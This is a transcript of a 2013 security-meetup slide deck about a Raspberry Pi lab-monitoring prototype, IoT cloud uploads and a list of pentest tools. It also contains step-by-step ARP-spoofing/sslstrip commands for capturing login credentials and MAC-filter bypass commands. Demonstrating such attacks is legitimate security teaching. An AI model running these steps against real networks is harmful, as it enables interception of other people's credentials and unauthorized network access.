The LabRat - Physical backdoor hacks and IOT primer

The LabRat Physical Backdoor Hacks and Internet of Things (IOT) Primer Akshat Sharma, TME, Cisco Systems.


null Bangalore Chapter - July 2013 Meet

Transcript of The LabRat - Physical backdoor hacks and IOT primer

Page 1: The LabRat - Physical backdoor hacks and IOT primer

The LabRat Physical Backdoor Hacks and Internet of Things (IOT) Primer

Akshat Sharma, TME, Cisco Systems.

Page 2: The LabRat - Physical backdoor hacks and IOT primer

The Raspberry Pi

• http://www.raspberrypi.org/downloads -- Image Downloads and Updates
• http://elinux.org/RPi_Low-level_peripherals -- working with gpio
• http://elinux.org/RPiconfig -- interfacing with screens

Google’s your Best Friend

Page 4: The LabRat - Physical backdoor hacks and IOT primer

The LabRat Circuit

[Circuit diagram. Labels: Temperature Sensor, Humidity Sensor, Optical Fiber Tester (IR LED - Receiver pairs, Optical Fiber, Binary Signal In); channels CH0, CH1, CH2, CH3; lines CLK, CS (AL), MOSI, MISO.]

Page 5: The LabRat - Physical backdoor hacks and IOT primer

The LabRat- a Proof of Concept Prototype

The Raspberry Pi – a $35 Linux Computer that powers the LabRat prototype.

To get more info on the Raspberry Pi – visit http://www.raspberrypi.org/

Page 6: The LabRat - Physical backdoor hacks and IOT primer

The LabRat Prototype Current Setup

• 10 inch Capacitive Touchscreen
• Optical Fiber Tester
• Humidity Sensor
• Temperature Sensor
• Raspberry-Pi
• HDMI-to-LVDS converter board
• 10,000 mAh Lithium Polymer Battery

Page 7: The LabRat - Physical backdoor hacks and IOT primer

The LabRat Prototype LM 35 + ADS7841 Temperature Sensor

LM 35 Temperature Sensor

ADS7841 Analog to Digital Converter

Page 8: The LabRat - Physical backdoor hacks and IOT primer

The LabRat Prototype Humidity Sensor SMD + ADS7841

ADS7841 Analog to Digital Converter

Humidity Sensor SMD

Page 9: The LabRat - Physical backdoor hacks and IOT primer

The LabRat Prototype Optical Fiber Tester

Optical Fiber Holders

Infra-red LED-Receiver Combination to transmit Messages via the Fiber

Page 10: The LabRat - Physical backdoor hacks and IOT primer

Connecting to an IOT Cloud

• https://xively.com/
• Formerly Cosm, Pachube

Page 11: The LabRat - Physical backdoor hacks and IOT primer

Set up a Cosm (Now Xively) Account

• Register on cosm (xively) and Add Device

• You will Receive an API Key and FEED ID

• Now use the old Cosm eeml library to set up Datastreams from the Raspberry Pi

Page 12: The LabRat - Physical backdoor hacks and IOT primer

Setting up the Python Script to send Data to Xively

Install EEML package from github

    sudo apt-get install python-dev
    sudo apt-get install python-pip
    sudo easy_install -U distribute
    sudo pip install rpi.gpio    # work with RPi GPIO pins
    wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python-eeml/tarball/master
    tar zxvf geekman-python-eeml.tar.gz
    cd geekman-python-eeml*
    sudo python setup.py install

Set up Python Script

    # source eeml package
    import eeml

    # <snip>

    API_KEY = 'YOUR_API_KEY'
    FEED = YOUR_FEED_ID
    API_URL = '/v2/feeds/{feednum}.xml'.format(feednum=FEED)

Page 13: The LabRat - Physical backdoor hacks and IOT primer

The LabRat Prototype Online Real-Time Feed – Temperature and Humidity

Visit the Real-Time Feed at https://cosm.com/feeds/89297

Page 14: The LabRat - Physical backdoor hacks and IOT primer

The LabRat Prototype Python Scripts

1) Python Script to upload the Temperature and Humidity Data to an online Cloud based feed that displays how the LabRat, in the Future, may do the same with Sensory Data at Customer Labs to provide Real-Time Analytics.

2) The same Python Script sends an email to lab-admins whenever the Temperature, humidity values exceed a pre-decided Threshold

3) Another Python Script to send messages (Binary Data) through an Optical Fiber using an Infrared LED-Receiver combination and email the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
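A sketch of the threshold alert in item 2, added here as an example and not taken from the LabRat scripts: it converts a raw ADS7841 count from the LM 35 channel to degrees Celsius and raises one email per threshold crossing instead of one per sample. The 3.3 V reference, the hysteresis band, the addresses and the sample counts are assumptions.

```python
from email.message import EmailMessage

ADC_MAX = 4095          # ADS7841 is a 12-bit converter
VREF = 3.3              # assumed reference voltage (not stated on the slides)
LM35_V_PER_C = 0.010    # LM35 outputs 10 mV per degree Celsius

def lm35_celsius(raw):
    """Convert a raw 12-bit ADC count from the LM35 channel to degrees C."""
    if not 0 <= raw <= ADC_MAX:
        raise ValueError("raw count outside 12-bit range: %r" % raw)
    return raw * VREF / ADC_MAX / LM35_V_PER_C

class ThresholdAlarm:
    """Fire once when a reading crosses the limit; re-arm only after it drops
    below limit - hysteresis, so a value hovering at the limit does not
    flood the lab-admin mailbox."""
    def __init__(self, name, limit, hysteresis):
        self.name, self.limit, self.hysteresis = name, limit, hysteresis
        self.active = False

    def update(self, value):
        if not self.active and value > self.limit:
            self.active = True
            return self._message(value)
        if self.active and value < self.limit - self.hysteresis:
            self.active = False
        return None

    def _message(self, value):
        msg = EmailMessage()
        msg["Subject"] = "LabRat alert: %s %.1f exceeds %.1f" % (
            self.name, value, self.limit)
        msg["From"] = "labrat@example.invalid"       # placeholder address
        msg["To"] = "lab-admins@example.invalid"     # placeholder address
        msg.set_content("%s reading %.1f is above threshold %.1f."
                        % (self.name, value, self.limit))
        return msg

def run(raw_samples, alarm):
    """Feed raw counts through the alarm; return subjects of alerts raised."""
    alerts = []
    for raw in raw_samples:
        msg = alarm.update(lm35_celsius(raw))
        if msg is not None:
            alerts.append(str(msg["Subject"]))
    return alerts

# Constructed sample counts: about 25.0, 36.0, 35.5, 31.0 and 37.0 degrees C
SAMPLES = [310, 447, 440, 385, 459]
```

The returned EmailMessage can be handed to smtplib for delivery; sending is left out so the block runs offline.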

Page 15: The LabRat - Physical backdoor hacks and IOT primer

The LabRat Prototype Current List of Penetration-Testing Tools

Information Gathering
-------------------
wireshark tcpflow ngrep hostmap kismet btscanner sslscan sslstrip sslsniff ssldump tcptraceroute netmask tcpdump zenmap nmap arp-fingerprint dnswalk dnstracer

Vulnerability Assessment
----------------------
airodump-ng sqlmap nikto svcrack

Exploitation Tools
------------------
aircrack-ng airmon-ng airodump-ng aireplay-ng sqlninja exploit-db

Privilege Escalation
-----------------
wireshark ettercap tcpreplay tcpick packit packeth dsniff

Maintaining Access
----------------
ptunnel netcat ftp-proxy udp-tunnel proxychains dns2tcp

Page 16: The LabRat - Physical backdoor hacks and IOT primer

DEMO

- Arp Spoofing using SSLstrip and arpspoof
- Mac Spoofing using Airmon-ng and macchanger
- Packet Sniffing using Wireshark
- Other MITM attacks

Page 17: The LabRat - Physical backdoor hacks and IOT primer

Arp Spoofing and Mac-Spoofing Attacks

Arp Spoofing

• Set up Port Forwarding

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    echo '1' > /proc/sys/net/ipv4/ip_forward

• Start Arp spoofing. Spoof the Gateway

    arpspoof -i wlan0 <gateway address>

• Start sslstrip and log User Information (use -k option to logout users from their current sessions, forcing them to re-login)

    sslstrip -k -l 8080

Mac Spoofing on Wifi (How to bypass Mac Filtering)

• ifconfig eth0 down
• airmon-ng start wlan0
• iwlist wlan0 scanning
• airodump-ng -c 6 -a --bssid <mac address of wireless access point> --- Gives info of connected devices
• ifconfig wlan0 down
• Now use macchanger
• macchanger -m <mac of allowed devices> wlan0
• ifconfig wlan0 up
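The defender's view of the gateway spoofing above, as an added example that is not part of the original slides: a check over neighbour-table snapshots in the format printed by `ip neigh show`. It flags a gateway entry whose MAC differs from a recorded baseline, and a gateway MAC that is also claimed by another IP. The addresses and the two snapshots are constructed.

```python
import re

NEIGH_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+) dev (?P<dev>\S+) "
    r"lladdr (?P<mac>[0-9a-f:]{17}) \S+$")

def parse_neigh(text):
    """Parse `ip neigh show` style lines into {ip: mac}.
    Entries without a link-layer address (e.g. FAILED) are skipped."""
    table = {}
    for line in text.strip().splitlines():
        m = NEIGH_RE.match(line.strip().lower())
        if m:
            table[m.group("ip")] = m.group("mac")
    return table

def check_snapshot(table, gateway_ip, baseline_mac):
    """Return a list of findings for one neighbour-table snapshot."""
    findings = []
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return findings
    if gw_mac != baseline_mac.lower():
        findings.append("gateway %s moved from %s to %s"
                        % (gateway_ip, baseline_mac, gw_mac))
    # A spoofing host answers for the gateway with its own MAC, so that
    # MAC shows up for two IPs at once.
    shared = sorted(ip for ip, mac in table.items()
                    if mac == gw_mac and ip != gateway_ip)
    if shared:
        findings.append("gateway MAC %s also claimed by %s"
                        % (gw_mac, ", ".join(shared)))
    return findings

# Constructed values (documentation IP range, locally administered MACs)
GATEWAY = "192.0.2.1"
BASELINE = "02:00:00:00:00:01"
BEFORE = """
192.0.2.1 dev wlan0 lladdr 02:00:00:00:00:01 REACHABLE
192.0.2.23 dev wlan0 lladdr 02:00:00:00:00:17 STALE
"""
DURING = """
192.0.2.1 dev wlan0 lladdr 02:00:00:00:00:17 REACHABLE
192.0.2.23 dev wlan0 lladdr 02:00:00:00:00:17 STALE
192.0.2.40 dev wlan0 FAILED
"""
```
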

Page 18: The LabRat - Physical backdoor hacks and IOT primer

Putting The Internet of Things into Perspective

Co-incidental Cisco Plugin :p

Page 19: The LabRat - Physical backdoor hacks and IOT primer

Thank You